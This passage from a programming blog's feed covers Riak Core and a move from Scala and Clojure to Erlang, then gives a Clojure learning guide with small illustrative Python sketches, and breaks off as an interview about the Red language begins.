&lt;p&gt;Riak Core is the foundation of Riak KV and other Basho projects. It’s the generic, reusable part of a “dynamo style” distributed system, providing abstractions and utilities to build multi-node, master-less distributed systems.&lt;&#x2F;p&gt;
&lt;p&gt;In a Riak Core based application you build your system by implementing interfaces that handle your application’s work inside virtual nodes (vnodes), which live inside a ring of vnodes. The work is done by routing commands consistently to those vnodes, hashing a key that you specify.&lt;&#x2F;p&gt;
&lt;p&gt;It also provides ways to run a command on more than one vnode and compare the results, to grow or shrink the cluster without downtime, and to migrate vnodes between physical nodes, plus authentication&#x2F;authorization and a metadata system that holds information about the cluster and your application in a distributed manner.&lt;&#x2F;p&gt;
&lt;p&gt;This frees you from having to implement all these building blocks yourself, so you can focus on what actually makes your application different, building on a tested and production-ready foundation.&lt;&#x2F;p&gt;
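&lt;p&gt;The consistent routing described above can be sketched as a toy ring. This is only an illustration of the general dynamo-style idea, not riak_core’s actual code; riak_core partitions a 160-bit SHA-1 hash space into a power-of-two number of partitions, which the sketch mimics:&lt;&#x2F;p&gt;

```python
import hashlib

RING_SIZE = 2 ** 160      # size of the SHA-1 hash space
NUM_PARTITIONS = 64       # number of vnodes/partitions on the ring

def key_to_partition(bucket, key):
    # Hash the (bucket, key) pair onto the ring, then map the hash
    # to one of the equally sized partitions. Each partition is
    # owned by a vnode that lives on some physical node.
    h = int(hashlib.sha1(bucket + key).hexdigest(), 16)
    return h // (RING_SIZE // NUM_PARTITIONS)

# The same key always lands on the same partition, which is what
# makes command routing consistent across the cluster.
partition = key_to_partition(b"users", b"mariano")
```

&lt;p&gt;Growing or shrinking the cluster then means reassigning partition ownership among physical nodes, rather than re-hashing every key.&lt;&#x2F;p&gt;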
&lt;p&gt;&lt;strong&gt;While reading your blog I could see that you have used Scala and Clojure apart from Erlang. What has been your experience with Scala and Clojure? What advantages and disadvantages did you find when comparing Scala, Clojure and Erlang?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The experience with the three languages has been really good; I’ve built similar systems with all of them (a kind of pub&#x2F;sub system with persistence). The reason I initially moved this backend from Scala (Lift+Akka) to Clojure (Immutant) was that the system handled a lot of semi-structured data, both from the frontend and the backend, and I was spending a lot of time putting that data into “rigid” types only to serialize it to JSON again after some operations. Each time the shape of the data evolved on the frontend or in storage I had to go and change those types in a backward-compatible manner, and it was getting really tiring since the backend was really simple in what it actually did.&lt;&#x2F;p&gt;
&lt;p&gt;So I decided to move to Clojure, and it resulted in a huge reduction in code. But as the code evolved I found myself implementing this pub&#x2F;sub-like system by hand with low-level tools like agents, atoms and promises, copying the Erlang “patterns”. At this point some customers were asking about scalability and clustering, so I decided to do a prototype using riak_core. After some coding we tried it on a new project, and since we could improve it fast and it was working quite nicely, we decided to adopt it as our default backend.&lt;&#x2F;p&gt;
&lt;p&gt;I’m still using Scala for Spark jobs, and I use Clojure for internal tools and internal frontends with ClojureScript, but the backend now is Erlang.&lt;&#x2F;p&gt;
&lt;p&gt;I just want to clarify that our backend is quite simple in what it does, so moving between languages in the backend is not a big deal; the bulk of what we do is in our frontend code.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to earn your Clojure white belt</title>
          <pubDate>Mon, 07 Sep 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-clojure-white-belt/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-clojure-white-belt/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-earn-your-clojure-white-belt/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-uFlthCHz1YbmOvzhdVBrFw.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I tend to think that if I do not know how to implement something then I do not completely understand how it works. That is why I want to learn so many things: new frameworks, programming languages, garbage collectors, type systems, compilers, editors, operating systems, protocols, kernel development. The road to enlightenment is long and difficult. To make things worse, you need to invest time in keeping up to date with technologies you thought you already knew. I usually feel like Mario in one of those levels where he needs to jump between moving clouds to reach the finish line.&lt;&#x2F;p&gt;
&lt;p&gt;That is why one of the best skills to acquire is being able to separate the wheat from the chaff. We have finite time and distractions are infinite. If you are going to invest time in learning a new language then you should consider Lisp, which is definitely wheat of the best quality. If you don’t know why, then go read the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.paulgraham.com&#x2F;avg.html&quot;&gt;Beating the Averages&lt;&#x2F;a&gt; article. Clojure is a member of the Lisp family. If you have used a Lisp dialect such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.schemers.org&#x2F;&quot;&gt;Scheme&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;common-lisp.net&#x2F;&quot;&gt;Common Lisp&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Emacs_Lisp&quot;&gt;Emacs Lisp&lt;&#x2F;a&gt;, or even really alien and amazing creatures such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.shenlanguage.org&#x2F;&quot;&gt;Shen&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lfe.io&#x2F;&quot;&gt;LFE&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;racket-lang.org&#x2F;&quot;&gt;Racket&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;pixie-lang&#x2F;pixie&quot;&gt;Pixie&lt;&#x2F;a&gt;, you might ask yourself why you should be learning Clojure. This is my opinionated point of view:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The language’s creator: Rich Hickey has a holistic understanding of this era’s development issues. You should read&#x2F;watch his talks called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matthiasn&#x2F;talk-transcripts&#x2F;blob&#x2F;master&#x2F;Hickey_Rich&#x2F;AreWeThereYet.md&quot;&gt;Are We There Yet?&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matthiasn&#x2F;talk-transcripts&#x2F;blob&#x2F;master&#x2F;Hickey_Rich&#x2F;SimpleMadeEasy.md&quot;&gt;Simple Made Easy&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;ROor6_NGIWU&quot;&gt;The Language of the System&lt;&#x2F;a&gt;. I see Clojure as a step in the right direction for tackling this era’s development issues&lt;&#x2F;li&gt;
&lt;li&gt;Great functional programming support: first-class functions, persistent, immutable data structures and lazy &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.braveclojure.com&#x2F;core-functions-in-depth&#x2F;#2__The_Sequence_Abstraction&quot;&gt;sequences&lt;&#x2F;a&gt;. It also has great support for polymorphism thanks to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojure-doc.org&#x2F;articles&#x2F;language&#x2F;polymorphism.html&quot;&gt;multimethods and protocols&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Concurrency support from its inception thanks to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojure-doc.org&#x2F;articles&#x2F;language&#x2F;concurrency_and_parallelism.html&quot;&gt;atoms, agents, refs, a software transactional memory &lt;&#x2F;a&gt;system and asynchronous programming using channels a la &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Communicating_sequential_processes&quot;&gt;CSP&lt;&#x2F;a&gt; with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojure.com&#x2F;blog&#x2F;2013&#x2F;06&#x2F;28&#x2F;clojure-core-async-channels.html&quot;&gt;core.async&lt;&#x2F;a&gt; library&lt;&#x2F;li&gt;
&lt;li&gt;Batteries included: good core libraries and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=6mTbuzafcII&quot;&gt;transducers&lt;&#x2F;a&gt; support&lt;&#x2F;li&gt;
&lt;li&gt;Clojurescript: Clojure that targets JavaScript with great libraries such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;reagent-project&#x2F;reagent&quot;&gt;reagent&lt;&#x2F;a&gt;, an interface to React.js that is really simple and useful. Check David Nolen’s talks called ClojureScript: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;MTawgp3SKy8&quot;&gt;Lisp’s Revenge&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;-I5ldi2aJTI&quot;&gt;Introduction to ClojureScript&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;JVM’s power (available almost everywhere, optimized garbage collector, JIT compilation, Java interoperability), but also some issues, such as not being able to properly support tail call optimization, and awful stacktraces. If you are a Java developer you should check parts &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=P76Vbsk_3J0&quot;&gt;I&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=hb3rurFxrZ8&quot;&gt;II&lt;&#x2F;a&gt; of Rich Hickey’s Clojure for Java Programmers talk&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
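&lt;p&gt;The CSP-style channels mentioned above can be approximated in most languages with threads and blocking queues. A rough Python sketch, using OS threads and a bounded queue in place of core.async’s lightweight go blocks (this is only an analogy, not how core.async is implemented):&lt;&#x2F;p&gt;

```python
import threading
import queue

def go(fn, *args):
    # Crude stand-in for a go block: run fn on its own thread.
    t = threading.Thread(target=fn, args=args, daemon=True)
    t.start()
    return t

def producer(ch):
    for i in range(3):
        ch.put(i)      # like a blocking put onto a channel
    ch.put(None)       # sentinel in place of closing the channel

def consumer(ch, out):
    while True:
        v = ch.get()   # like a blocking take from a channel
        if v is None:
            break
        out.append(v * 10)

ch = queue.Queue(maxsize=1)   # bounded, so puts block like channel puts
results = []
workers = [go(producer, ch), go(consumer, ch, results)]
for w in workers:
    w.join()
# results is now [0, 10, 20]
```

&lt;p&gt;core.async gives you the same shape of program on the JVM and in ClojureScript, but with cheap go blocks instead of OS threads.&lt;&#x2F;p&gt;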
&lt;h3 id=&quot;ready-steady-go&quot;&gt;Ready, steady, go!&lt;&#x2F;h3&gt;
&lt;p&gt;Install &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;leiningen.org&#x2F;#install&quot;&gt;Leiningen&lt;&#x2F;a&gt; and configure your editor of choice.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Emacs with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure-emacs&#x2F;cider&quot;&gt;Cider&lt;&#x2F;a&gt; &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure-emacs&#x2F;clojure-mode&quot;&gt;Clojure mode&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;company-mode.github.io&quot;&gt;Company mode&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Vim with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tpope&#x2F;vim-fireplace&quot;&gt;vim-fireplace&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tpope&#x2F;vim-sexp-mappings-for-regular-people&quot;&gt;vim-sexp-mappings-for-regular-people&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tpope&#x2F;vim-salve&quot;&gt;vim-salve&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;luochen1990&#x2F;rainbow&quot;&gt;rainbow&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lighttable.com&#x2F;&quot;&gt;Light Table&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;sekao.net&#x2F;nightcode&#x2F;&quot;&gt;Nightcode&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Sublime with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;odyssomay&#x2F;paredit&quot;&gt;paredit&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;odyssomay&#x2F;sublime-lispindent&quot;&gt;Lispindent&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.google.com.ar&#x2F;search?q=SublimeREPL&quot;&gt;SublimeREPL&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cursiveclojure.com&#x2F;&quot;&gt;Cursive&lt;&#x2F;a&gt; (IntelliJ)&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;doc.ccw-ide.org&#x2F;documentation.html#install-as-standalone-product&quot;&gt;Counterclockwise&lt;&#x2F;a&gt; (Eclipse)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h4 id=&quot;good-tools-that-deserve-a-mention&quot;&gt;Good tools that deserve a mention&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;Linter &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jonase&#x2F;eastwood&quot;&gt;Eastwood&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Idiomatic Clojure checker &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jonase&#x2F;kibit&quot;&gt;kibit&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Clojure formatter &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;weavejester&#x2F;cljfmt&quot;&gt;cljfmt&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Check simple issues in your code &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dakrone&#x2F;lein-bikeshed&quot;&gt;bikeshed&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;love-at-first-sight&quot;&gt;Love at first sight&lt;&#x2F;h3&gt;
&lt;p&gt;First of all get an idea of Clojure syntax and semantics:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learnxinyminutes.com&#x2F;docs&#x2F;clojure&#x2F;&quot;&gt;Learn X in Y minutes where X=clojure&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;kimh.github.io&#x2F;clojure-by-example&#x2F;&quot;&gt;Clojure by example&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;howistart.org&#x2F;posts&#x2F;clojure&#x2F;1&#x2F;&quot;&gt;How I start Clojure&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.se-radio.net&#x2F;2010&#x2F;03&#x2F;episode-158-rich-hickey-on-clojure&#x2F;&quot;&gt;Listen to Software Engineering Radio’s interview with Rich Hickey&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;If you do not understand something move on. At this stage the only objective is to grasp some basic ideas about Clojure.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;practice-plus-reading-equals-perfection&quot;&gt;Practice plus reading equals perfection&lt;&#x2F;h4&gt;
&lt;ol&gt;
&lt;li&gt;First practice with the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojurekoans.com&#x2F;&quot;&gt;Koans&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Then read &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.braveclojure.com&#x2F;&quot;&gt;Clojure for the Brave and True&lt;&#x2F;a&gt;, a simple and short book. If you prefer to watch videos, you can buy the course &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.purelyfunctional.tv&#x2F;intro-to-clojure&quot;&gt;Introduction to Clojure&lt;&#x2F;a&gt; from PurelyFunctionalTV.&lt;&#x2F;li&gt;
&lt;li&gt;Practice again with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.4clojure.com&#x2F;&quot;&gt;4clojure problems&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Follow the road to perfection with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;exercism.io&#x2F;languages&#x2F;clojure&quot;&gt;Clojure exercism&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Finish the practice with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;gigasquid&#x2F;wonderland-clojure-katas&quot;&gt;Wonderland Clojure Katas&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;It is always a good idea to have the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;clojure.org&#x2F;api&#x2F;cheatsheet&quot;&gt;cheatsheet&lt;&#x2F;a&gt; at hand.&lt;&#x2F;p&gt;
&lt;p&gt;Two other good tutorials worth mentioning are &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;aphyr.com&#x2F;tags&#x2F;Clojure-from-the-ground-up&quot;&gt;Clojure from the ground up&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;hitchhikersclojure.com&#x2F;&quot;&gt;Hitchhiker’s Guide to Clojure&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;idiomatic-clojure&quot;&gt;Idiomatic Clojure&lt;&#x2F;h4&gt;
&lt;p&gt;Clojure is not Java, nor is it Common Lisp or Scheme. You should learn to write idiomatic Clojure. The Joy of Clojure is your best friend to become a native Clojure speaker:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.joyofclojure.com&#x2F;the-book&#x2F;&quot;&gt;The Joy of Clojure&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It is also important to follow table manners or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bbatsov&#x2F;clojure-style-guide&quot;&gt;Clojure style guide&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;If you have trouble like me grasping macros, then you should also check out &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pragprog.com&#x2F;book&#x2F;cjclojure&#x2F;mastering-clojure-macros&quot;&gt;Mastering Clojure Macros&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Oh, and if you miss your type checking, now is a good time to read about the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;typedclojure.org&#x2F;&quot;&gt;optional type system&lt;&#x2F;a&gt; for Clojure.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;keep-up-to-date&quot;&gt;Keep up to date&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;planet.clojure.in&#x2F;&quot;&gt;Planet Clojure&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.clojuregazette.com&#x2F;&quot;&gt;Clojure Gazette&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;reborg.tumblr.com&#x2F;&quot;&gt;Clojure Weekly&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;Clojure&#x2F;&quot;&gt;Reddit&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;user&#x2F;ClojureTV&quot;&gt;ClojureTV&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h4 id=&quot;know-the-full-arsenal-at-your-disposal&quot;&gt;Know the full arsenal at your disposal&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.clojure-toolbox.com&#x2F;&quot;&gt;Clojure Toolbox&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;razum2um&#x2F;awesome-clojure&quot;&gt;Awesome Clojure&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h4 id=&quot;get-help&quot;&gt;Get help&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;groups.google.com&#x2F;forum&#x2F;#!forum&#x2F;clojure&quot;&gt;Google Group&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;IRC: #clojure channel in Freenode server&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;clojurians.slack.com&#x2F;&quot;&gt;Clojurians Slack&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h4 id=&quot;introduction-to-clojurescript&quot;&gt;Introduction to Clojurescript&lt;&#x2F;h4&gt;
&lt;p&gt;Clojure in the frontend trenches:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure&#x2F;clojurescript&#x2F;wiki&#x2F;Quick-Start&quot;&gt;Quickstart&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojure&#x2F;clojurescript&#x2F;wiki&#x2F;Differences-from-Clojure&quot;&gt;Differences from Clojure&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;magomimmo&#x2F;modern-cljs&quot;&gt;A series of tutorials on Clojurescript&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;h4 id=&quot;building-your-own-lisp&quot;&gt;Building your own Lisp&lt;&#x2F;h4&gt;
&lt;p&gt;Building a Lisp is similar to a road trip with friends and good music but with no particular destination. Make yourself comfortable and enjoy the ride!&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.buildyourownlisp.com&#x2F;&quot;&gt;Build your own Lisp&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikibooks.org&#x2F;wiki&#x2F;Write_Yourself_a_Scheme_in_48_Hours&quot;&gt;Write Yourself a Scheme in 48 hours&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;norvig.com&#x2F;lispy.html&quot;&gt;(How to Write a (Lisp) Interpreter (in Python))&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</description>
      </item>
      <item>
          <title>Interview with Nenad Rakocevic about Red, a Rebol inspired programming language</title>
          <pubDate>Fri, 28 Aug 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-nenad-rakocevic-about-red-a-rebol-inspired-programming-language/">&lt;p&gt;After our &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;interview-with-brian-mckenna-about-roy-purescript-haskell-idris-and-dependent-types-63bb1289ea3d&quot;&gt;last interview with Brian McKenna&lt;&#x2F;a&gt; for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&quot;&gt;This is not a Monad tutorial&lt;&#x2F;a&gt; we interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dockimbel&quot;&gt;Nenad Rakocevic&lt;&#x2F;a&gt;, creator of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.red-lang.org&#x2F;&quot;&gt;Red&lt;&#x2F;a&gt; programming language.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-C0sMUPxpbBs40YIBX848jQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;From my completely subjective point of view Red and Rebol are quite strange creatures! But don’t get me wrong, that is not a bad thing. For example, I am not aware of many high-level languages that feature an embedded DSL for general-purpose low-level programming, or that have 50 native types. You should check it out; you might find some interesting ideas inside Red’s development.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Please tell us a little bit about Red’s inception. Why was it created?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
